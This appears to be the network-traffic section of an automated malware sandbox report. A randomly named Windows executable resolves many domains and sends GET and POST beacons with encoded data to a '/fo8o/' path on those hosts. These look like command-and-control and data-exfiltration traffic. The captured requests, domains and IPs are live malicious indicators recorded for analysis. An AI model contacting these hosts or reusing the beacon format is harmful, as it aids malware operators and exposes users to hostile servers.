            Aug 2, 2024 13:53:35.868242025 CEST8064509199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:35.868252039 CEST8064509199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:35.868283987 CEST6450980192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:35.868283987 CEST6450980192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:36.855360031 CEST6450980192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:37.873577118 CEST6451080192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:37.878840923 CEST8064510199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:37.878920078 CEST6451080192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:37.881253004 CEST6451080192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:37.886255026 CEST8064510199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:38.363174915 CEST8064510199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:38.363200903 CEST8064510199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:38.363262892 CEST6451080192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:38.363351107 CEST8064510199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:38.363387108 CEST6451080192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:39.384840012 CEST6451080192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:40.419657946 CEST6451180192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:40.424968004 CEST8064511199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:40.425045967 CEST6451180192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:40.427459955 CEST6451180192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:40.432626963 CEST8064511199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:40.432651997 CEST8064511199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:40.922607899 CEST8064511199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:40.922648907 CEST8064511199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:40.922734022 CEST8064511199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:40.922902107 CEST6451180192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:41.931791067 CEST6451180192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:42.950613022 CEST6451280192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:42.955746889 CEST8064512199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:42.956491947 CEST6451280192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:42.959279060 CEST6451280192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:42.964572906 CEST8064512199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:43.440464973 CEST8064512199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:43.440551996 CEST8064512199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:43.440783024 CEST8064512199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:43.440829039 CEST6451280192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:43.440975904 CEST6451280192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:43.443440914 CEST6451280192.168.2.6199.59.243.226
            Aug 2, 2024 13:53:43.448282003 CEST8064512199.59.243.226192.168.2.6
            Aug 2, 2024 13:53:56.764864922 CEST6451580192.168.2.672.52.178.23
            Aug 2, 2024 13:53:56.769834995 CEST806451572.52.178.23192.168.2.6
            Aug 2, 2024 13:53:56.769906998 CEST6451580192.168.2.672.52.178.23
            Aug 2, 2024 13:53:56.772433043 CEST6451580192.168.2.672.52.178.23
            Aug 2, 2024 13:53:56.777345896 CEST806451572.52.178.23192.168.2.6
            Aug 2, 2024 13:53:57.323911905 CEST806451572.52.178.23192.168.2.6
            Aug 2, 2024 13:53:57.324048042 CEST6451580192.168.2.672.52.178.23
            Aug 2, 2024 13:53:58.276041985 CEST6451580192.168.2.672.52.178.23
            Aug 2, 2024 13:53:58.281553030 CEST806451572.52.178.23192.168.2.6
            Aug 2, 2024 13:53:59.295722961 CEST6451680192.168.2.672.52.178.23
            Aug 2, 2024 13:53:59.300992012 CEST806451672.52.178.23192.168.2.6
            Aug 2, 2024 13:53:59.303679943 CEST6451680192.168.2.672.52.178.23
            Aug 2, 2024 13:53:59.307461977 CEST6451680192.168.2.672.52.178.23
            Aug 2, 2024 13:53:59.315119982 CEST806451672.52.178.23192.168.2.6
            Aug 2, 2024 13:53:59.843750000 CEST806451672.52.178.23192.168.2.6
            Aug 2, 2024 13:53:59.845412970 CEST6451680192.168.2.672.52.178.23
            Aug 2, 2024 13:54:00.807029009 CEST6451680192.168.2.672.52.178.23
            Aug 2, 2024 13:54:00.998713970 CEST806451672.52.178.23192.168.2.6
            Aug 2, 2024 13:54:01.825542927 CEST6451780192.168.2.672.52.178.23
            Aug 2, 2024 13:54:01.833333969 CEST806451772.52.178.23192.168.2.6
            Aug 2, 2024 13:54:01.835647106 CEST6451780192.168.2.672.52.178.23
            Aug 2, 2024 13:54:01.841324091 CEST6451780192.168.2.672.52.178.23
            Aug 2, 2024 13:54:01.847141027 CEST806451772.52.178.23192.168.2.6
            Aug 2, 2024 13:54:01.847460985 CEST806451772.52.178.23192.168.2.6
            Aug 2, 2024 13:54:02.364799023 CEST806451772.52.178.23192.168.2.6
            Aug 2, 2024 13:54:02.364864111 CEST6451780192.168.2.672.52.178.23
            Aug 2, 2024 13:54:03.353626966 CEST6451780192.168.2.672.52.178.23
            Aug 2, 2024 13:54:03.358673096 CEST806451772.52.178.23192.168.2.6
            Aug 2, 2024 13:54:04.372670889 CEST6451880192.168.2.672.52.178.23
            Aug 2, 2024 13:54:04.378901958 CEST806451872.52.178.23192.168.2.6
            Aug 2, 2024 13:54:04.379035950 CEST6451880192.168.2.672.52.178.23
            Aug 2, 2024 13:54:04.381237030 CEST6451880192.168.2.672.52.178.23
            Aug 2, 2024 13:54:04.387762070 CEST806451872.52.178.23192.168.2.6
            Aug 2, 2024 13:54:04.921484947 CEST806451872.52.178.23192.168.2.6
            Aug 2, 2024 13:54:04.925630093 CEST6451880192.168.2.672.52.178.23
            Aug 2, 2024 13:54:04.929413080 CEST6451880192.168.2.672.52.178.23
            Aug 2, 2024 13:54:04.934380054 CEST806451872.52.178.23192.168.2.6
            Aug 2, 2024 13:54:10.104614019 CEST6451980192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:10.109591961 CEST8064519194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:10.109734058 CEST6451980192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:10.112143040 CEST6451980192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:10.117243052 CEST8064519194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:10.844825983 CEST8064519194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:10.844846964 CEST8064519194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:10.844861031 CEST8064519194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:10.844875097 CEST8064519194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:10.844901085 CEST6451980192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:10.844943047 CEST6451980192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:11.619519949 CEST6451980192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:12.638818979 CEST6452080192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:12.643665075 CEST8064520194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:12.643731117 CEST6452080192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:12.646102905 CEST6452080192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:12.650914907 CEST8064520194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:13.348253965 CEST8064520194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:13.348283052 CEST8064520194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:13.348309040 CEST8064520194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:13.348334074 CEST8064520194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:13.348335028 CEST6452080192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:13.348428965 CEST6452080192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:14.150568008 CEST6452080192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:15.169437885 CEST6452180192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:15.177263021 CEST8064521194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:15.177512884 CEST6452180192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:15.179466009 CEST6452180192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:15.184546947 CEST8064521194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:15.184575081 CEST8064521194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:15.888492107 CEST8064521194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:15.888547897 CEST8064521194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:15.888554096 CEST8064521194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:15.888559103 CEST8064521194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:15.888614893 CEST6452180192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:16.681778908 CEST6452180192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:17.700731993 CEST6452280192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:17.706990957 CEST8064522194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:17.708058119 CEST6452280192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:17.711461067 CEST6452280192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:17.719777107 CEST8064522194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:18.417612076 CEST8064522194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:18.417706013 CEST8064522194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:18.417717934 CEST8064522194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:18.417776108 CEST8064522194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:18.417787075 CEST8064522194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:18.417799950 CEST8064522194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:18.417841911 CEST6452280192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:18.417864084 CEST8064522194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:18.417879105 CEST8064522194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:18.417890072 CEST6452280192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:18.417891979 CEST8064522194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:18.417902946 CEST8064522194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:18.417921066 CEST6452280192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:18.417942047 CEST6452280192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:18.423356056 CEST6452280192.168.2.6194.67.71.191
            Aug 2, 2024 13:54:18.428190947 CEST8064522194.67.71.191192.168.2.6
            Aug 2, 2024 13:54:26.490597010 CEST6452380192.168.2.6154.215.72.110
            Aug 2, 2024 13:54:26.495645046 CEST8064523154.215.72.110192.168.2.6
            Aug 2, 2024 13:54:26.495708942 CEST6452380192.168.2.6154.215.72.110
            Aug 2, 2024 13:54:26.497638941 CEST6452380192.168.2.6154.215.72.110
            Aug 2, 2024 13:54:26.502443075 CEST8064523154.215.72.110192.168.2.6
            Aug 2, 2024 13:54:27.402843952 CEST8064523154.215.72.110192.168.2.6
            Aug 2, 2024 13:54:27.402904987 CEST8064523154.215.72.110192.168.2.6
            Aug 2, 2024 13:54:27.403002977 CEST6452380192.168.2.6154.215.72.110
            Aug 2, 2024 13:54:27.405644894 CEST6452380192.168.2.6154.215.72.110
            Aug 2, 2024 13:54:27.410511971 CEST8064523154.215.72.110192.168.2.6
            Aug 2, 2024 13:54:34.200560093 CEST6452480192.168.2.652.25.92.0
            Aug 2, 2024 13:54:34.207166910 CEST806452452.25.92.0192.168.2.6
            Aug 2, 2024 13:54:34.207285881 CEST6452480192.168.2.652.25.92.0
            Aug 2, 2024 13:54:34.209228039 CEST6452480192.168.2.652.25.92.0
            Aug 2, 2024 13:54:34.214245081 CEST806452452.25.92.0192.168.2.6
            Aug 2, 2024 13:54:34.837361097 CEST806452452.25.92.0192.168.2.6
            Aug 2, 2024 13:54:34.837378025 CEST806452452.25.92.0192.168.2.6
            Aug 2, 2024 13:54:34.837398052 CEST806452452.25.92.0192.168.2.6
            Aug 2, 2024 13:54:34.837697029 CEST6452480192.168.2.652.25.92.0
            TimestampSource PortDest PortSource IPDest IP
            Aug 2, 2024 13:50:51.228025913 CEST5376853192.168.2.61.1.1.1
            Aug 2, 2024 13:50:52.212675095 CEST5376853192.168.2.61.1.1.1
            Aug 2, 2024 13:50:52.785023928 CEST53537681.1.1.1192.168.2.6
            Aug 2, 2024 13:50:52.785034895 CEST53537681.1.1.1192.168.2.6
            Aug 2, 2024 13:51:07.858867884 CEST5138653192.168.2.61.1.1.1
            Aug 2, 2024 13:51:08.196863890 CEST53513861.1.1.1192.168.2.6
            Aug 2, 2024 13:51:21.685153008 CEST5901753192.168.2.61.1.1.1
            Aug 2, 2024 13:51:22.053474903 CEST53590171.1.1.1192.168.2.6
            Aug 2, 2024 13:51:35.614331961 CEST5167053192.168.2.61.1.1.1
            Aug 2, 2024 13:51:35.631979942 CEST53516701.1.1.1192.168.2.6
            Aug 2, 2024 13:51:48.920150042 CEST5607153192.168.2.61.1.1.1
            Aug 2, 2024 13:51:49.045622110 CEST53560711.1.1.1192.168.2.6
            Aug 2, 2024 13:52:02.436141968 CEST5560653192.168.2.61.1.1.1
            Aug 2, 2024 13:52:02.454740047 CEST53556061.1.1.1192.168.2.6
            Aug 2, 2024 13:52:16.201751947 CEST5087653192.168.2.61.1.1.1
            Aug 2, 2024 13:52:16.450155020 CEST53508761.1.1.1192.168.2.6
            Aug 2, 2024 13:52:30.108503103 CEST5188553192.168.2.61.1.1.1
            Aug 2, 2024 13:52:30.141890049 CEST53518851.1.1.1192.168.2.6
            Aug 2, 2024 13:52:43.451426983 CEST6027753192.168.2.61.1.1.1
            Aug 2, 2024 13:52:43.534775972 CEST53602771.1.1.1192.168.2.6
            Aug 2, 2024 13:52:56.889158010 CEST4997653192.168.2.61.1.1.1
            Aug 2, 2024 13:52:57.395076036 CEST53499761.1.1.1192.168.2.6
            Aug 2, 2024 13:53:10.514247894 CEST6368053192.168.2.61.1.1.1
            Aug 2, 2024 13:53:10.867156982 CEST53636801.1.1.1192.168.2.6
            Aug 2, 2024 13:53:18.937091112 CEST5215853192.168.2.61.1.1.1
            Aug 2, 2024 13:53:19.009939909 CEST53521581.1.1.1192.168.2.6
            Aug 2, 2024 13:53:32.280333996 CEST5893453192.168.2.61.1.1.1
            Aug 2, 2024 13:53:33.279695034 CEST5893453192.168.2.61.1.1.1
            Aug 2, 2024 13:53:33.287067890 CEST53589341.1.1.1192.168.2.6
            Aug 2, 2024 13:53:38.144359112 CEST53589341.1.1.1192.168.2.6
            Aug 2, 2024 13:53:48.451680899 CEST5013253192.168.2.61.1.1.1
            Aug 2, 2024 13:53:48.486113071 CEST53501321.1.1.1192.168.2.6
            Aug 2, 2024 13:53:56.545798063 CEST5244753192.168.2.61.1.1.1
            Aug 2, 2024 13:53:56.761606932 CEST53524471.1.1.1192.168.2.6
            Aug 2, 2024 13:54:09.936032057 CEST6507053192.168.2.61.1.1.1
            Aug 2, 2024 13:54:10.101701021 CEST53650701.1.1.1192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 2, 2024 13:50:51.228025913 CEST | 192.168.2.6 | 1.1.1.1 | 0xae89 | Standard query (0) | www.3xfootball.com | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:50:52.212675095 CEST | 192.168.2.6 | 1.1.1.1 | 0xae89 | Standard query (0) | www.3xfootball.com | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:51:07.858867884 CEST | 192.168.2.6 | 1.1.1.1 | 0xa978 | Standard query (0) | www.kasegitai.tokyo | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:51:21.685153008 CEST | 192.168.2.6 | 1.1.1.1 | 0x13e5 | Standard query (0) | www.goldenjade-travel.com | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:51:35.614331961 CEST | 192.168.2.6 | 1.1.1.1 | 0x187a | Standard query (0) | www.antonio-vivaldi.mobi | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:51:48.920150042 CEST | 192.168.2.6 | 1.1.1.1 | 0x7d28 | Standard query (0) | www.magmadokum.com | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:52:02.436141968 CEST | 192.168.2.6 | 1.1.1.1 | 0xd926 | Standard query (0) | www.rssnewscast.com | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:52:16.201751947 CEST | 192.168.2.6 | 1.1.1.1 | 0x6195 | Standard query (0) | www.liangyuen528.com | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:52:30.108503103 CEST | 192.168.2.6 | 1.1.1.1 | 0xc896 | Standard query (0) | www.techchains.info | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:52:43.451426983 CEST | 192.168.2.6 | 1.1.1.1 | 0x5b6b | Standard query (0) | www.elettrosistemista.zip | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:52:56.889158010 CEST | 192.168.2.6 | 1.1.1.1 | 0xd3ad | Standard query (0) | www.donnavariedades.com | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:53:10.514247894 CEST | 192.168.2.6 | 1.1.1.1 | 0xeb50 | Standard query (0) | www.660danm.top | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:53:18.937091112 CEST | 192.168.2.6 | 1.1.1.1 | 0x5be2 | Standard query (0) | www.empowermedeco.com | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:53:32.280333996 CEST | 192.168.2.6 | 1.1.1.1 | 0xc72b | Standard query (0) | www.joyesi.xyz | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:53:33.279695034 CEST | 192.168.2.6 | 1.1.1.1 | 0xc72b | Standard query (0) | www.joyesi.xyz | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:53:48.451680899 CEST | 192.168.2.6 | 1.1.1.1 | 0xe89c | Standard query (0) | www.k9vyp11no3.cfd | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:53:56.545798063 CEST | 192.168.2.6 | 1.1.1.1 | 0x9045 | Standard query (0) | www.shenzhoucui.com | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:54:09.936032057 CEST | 192.168.2.6 | 1.1.1.1 | 0x273a | Standard query (0) | www.b301.space | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 2, 2024 13:50:52.785023928 CEST | 1.1.1.1 | 192.168.2.6 | 0xae89 | No error (0) | www.3xfootball.com | | 154.215.72.110 | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:50:52.785034895 CEST | 1.1.1.1 | 192.168.2.6 | 0xae89 | No error (0) | www.3xfootball.com | | 154.215.72.110 | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:51:08.196863890 CEST | 1.1.1.1 | 192.168.2.6 | 0xa978 | No error (0) | www.kasegitai.tokyo | | 52.25.92.0 | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:51:22.053474903 CEST | 1.1.1.1 | 192.168.2.6 | 0x13e5 | No error (0) | www.goldenjade-travel.com | | 116.50.37.244 | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:51:35.631979942 CEST | 1.1.1.1 | 192.168.2.6 | 0x187a | No error (0) | www.antonio-vivaldi.mobi | | 46.30.211.38 | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:51:49.045622110 CEST | 1.1.1.1 | 192.168.2.6 | 0x7d28 | No error (0) | www.magmadokum.com | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 2, 2024 13:51:49.045622110 CEST | 1.1.1.1 | 192.168.2.6 | 0x7d28 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 2, 2024 13:51:49.045622110 CEST | 1.1.1.1 | 192.168.2.6 | 0x7d28 | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:52:02.454740047 CEST | 1.1.1.1 | 192.168.2.6 | 0xd926 | No error (0) | www.rssnewscast.com | | 91.195.240.94 | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:52:16.450155020 CEST | 1.1.1.1 | 192.168.2.6 | 0x6195 | No error (0) | www.liangyuen528.com | | 15.197.172.60 | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:52:30.141890049 CEST | 1.1.1.1 | 192.168.2.6 | 0xc896 | No error (0) | www.techchains.info | | 66.29.149.46 | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:52:43.534775972 CEST | 1.1.1.1 | 192.168.2.6 | 0x5b6b | No error (0) | www.elettrosistemista.zip | elettrosistemista.zip | | CNAME (Canonical name) | IN (0x0001) | false
Aug 2, 2024 13:52:43.534775972 CEST | 1.1.1.1 | 192.168.2.6 | 0x5b6b | No error (0) | elettrosistemista.zip | | 195.110.124.133 | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:52:57.395076036 CEST | 1.1.1.1 | 192.168.2.6 | 0xd3ad | No error (0) | www.donnavariedades.com | | 15.197.240.20 | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:53:10.867156982 CEST | 1.1.1.1 | 192.168.2.6 | 0xeb50 | Name error (3) | www.660danm.top | none | none | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:53:19.009939909 CEST | 1.1.1.1 | 192.168.2.6 | 0x5be2 | No error (0) | www.empowermedeco.com | empowermedeco.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 2, 2024 13:53:19.009939909 CEST | 1.1.1.1 | 192.168.2.6 | 0x5be2 | No error (0) | empowermedeco.com | | 217.196.55.202 | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:53:38.144359112 CEST | 1.1.1.1 | 192.168.2.6 | 0xc72b | Server failure (2) | www.joyesi.xyz | none | none | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:53:48.486113071 CEST | 1.1.1.1 | 192.168.2.6 | 0xe89c | Name error (3) | www.k9vyp11no3.cfd | none | none | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:53:56.761606932 CEST | 1.1.1.1 | 192.168.2.6 | 0x9045 | No error (0) | www.shenzhoucui.com | | 72.52.178.23 | A (IP address) | IN (0x0001) | false
Aug 2, 2024 13:54:10.101701021 CEST | 1.1.1.1 | 192.168.2.6 | 0x273a | No error (0) | www.b301.space | | 194.67.71.191 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49720 | 154.215.72.110 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
Timestamp | Bytes transferred | Direction | Data
Aug 2, 2024 13:50:52.805896044 CEST | 525 | OUT | GET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyIi7V/S5J9AzlXPHqpluzE36hxZsh30r8poflPmNwlfmk35jvL8= HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.3xfootball.com
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            1 | 192.168.2.6 | 49723 | 52.25.92.0 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:51:08.206670046 CEST | 786 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.kasegitai.tokyo
            Origin: http://www.kasegitai.tokyo
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 209
            Referer: http://www.kasegitai.tokyo/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 35 4a 6c 4b 4c 7a 61 4b 56 70 31 77 4a 5a 76 70 77 56 49 68 75 42 43 58 53 48 62 6c 32 71 6c 5a 2b 79 49 57 5a 2b 61 46 2f 2f 42 72 6b 77 51 5a 6d 6c 71 64 38 54 35 32 76 54 57 45 67 77 41 56 68 42 38 69 6e 33 6f 45 74 35 2f 53 55 34 79 6d 76 43 4e 39 73 66 79 73 79 67 68 45 77 5a 4f 31 47 62 49 4d 4c 67 45 53 42 69 78 58 65 77 45 46 2f 33 64 62 2b 4f 4f 6c 58 45 70 6a 39 6f 58 75 59 57 54 43 67 42 68 32 50 37 39 7a 47 73 76 43 58 68 7a 62 50 30 42 39 74 70 48 4a 50 4e 6d 66 66 33 4f 6a 34 68 39 38 78 6f 45 48 42 33 45 74 49 7a 2f 63 65 67 36 4e 67 68 4d 58 57 72 64 61 4a 39 74 62 66 31 64 53 36 4e 39 38
            Data Ascii: blWd=5JlKLzaKVp1wJZvpwVIhuBCXSHbl2qlZ+yIWZ+aF//BrkwQZmlqd8T52vTWEgwAVhB8in3oEt5/SU4ymvCN9sfysyghEwZO1GbIMLgESBixXewEF/3db+OOlXEpj9oXuYWTCgBh2P79zGsvCXhzbP0B9tpHJPNmff3Oj4h98xoEHB3EtIz/ceg6NghMXWrdaJ9tbf1dS6N98
            Aug 2, 2024 13:51:08.821131945 CEST | 1236 | IN | HTTP/1.1 200 OK
            Server: nginx
            Date: Fri, 02 Aug 2024 11:51:08 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            Content-Encoding: gzip
            Data Raw: 38 33 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 ff 73 13 c7 15 ff 59 fe 2b 96 9b 0e 27 25 a7 3b db 80 6b 6c 9d 18 08 38 d0 42 48 8b 33 6d c7 e3 61 56 ba d5 dd da 7b b7 e2 6e 25 59 31 cc f8 4e 84 f2 2d 85 36 2d 9d 90 74 12 1a 9a b4 74 06 3a 0d ed b4 c1 0d ff 4b 17 19 f8 89 7f a1 6f ef 24 eb 8b 4d 48 a6 f9 c1 a7 db dd b7 9f f7 de e7 bd dd 7b cf 13 a5 3d 0e af 8a 76 9d 20 4f f8 ac 3c 51 52 3f 88 e1 c0 b5 b5 95 ba a6 26 08 76 ca 13 b9 92 4f 04 46 55 0f 87 11 11 b6 f6 ce e2 42 71 56 db 9e 0f b0 4f 6c ad 49 49 ab ce 43 a1 a1 2a 0f 04 09 40 ae 45 1d e1 d9 0e 69 d2 2a 29 a6 03 03 d1 80 0a 8a 59 31 aa 62 46 ec 29 03 f9 78 8d fa 0d 7f 30 d1 88 48 98 8e 70 05 26 02 9e 2a 12 54 30 52 de 3f b9 0f 2d f0 b0 42 1d 87 04 25 2b 9b 84 55 46 83 55 14 12 66 6b 91 68 33 12 79 84 80 1d ca 33 5b 13 64 4d 58 d5 28 d2 90 17 92 9a ad 59 a9 88 a9 66 d4 d6 3d c5 e2 b0 17 21 af 70 11 0d f9 10 70 1a 38 64 4d 43 56 b9 58 ec 6d 58 a2 35 e4 0a 82 4e 1c 43 07 97 d5 5c 0a 39 ae 0f 16 72 a6 1b 62 87 02 10 5a 87 51 ae 46 99 20 e1 1c [TRUNCATED]
            Data Ascii: 831XsY+'%;kl8BH3maV{n%Y1N-6-tt:Ko$MH{=v O<QR?&vOFUBqVOlIIC*@Ei*)Y1bF)x0Hp&*T0R?-B%+UFUfkh3y3[dMX(Yf=!pp8dMCVXmX5NC\9rbZQF x@aIH)Bor"v)`(".Z#|p`-/->7HK" M0v.\&Qv1F|X|TX\6&r+ Pd`p>${t}~Q;"lDahZfVf!}a5CPwIHqxH+F_([AjCfy1dxx0q(EX,%+;&i.UFU*WW+&m>l(KH 2V;M<B]|RCYUoi>C:4W4hy%+3^f(kVkJ:%]^i'(t@<853;;;GMuBjpUww7y`02!@>vn(R"J41Nz)hOoWT>~S$+RlIogQ)[qLR\ md@nsEv|)O/^=(7R%,s|!; [TRUNCATED]
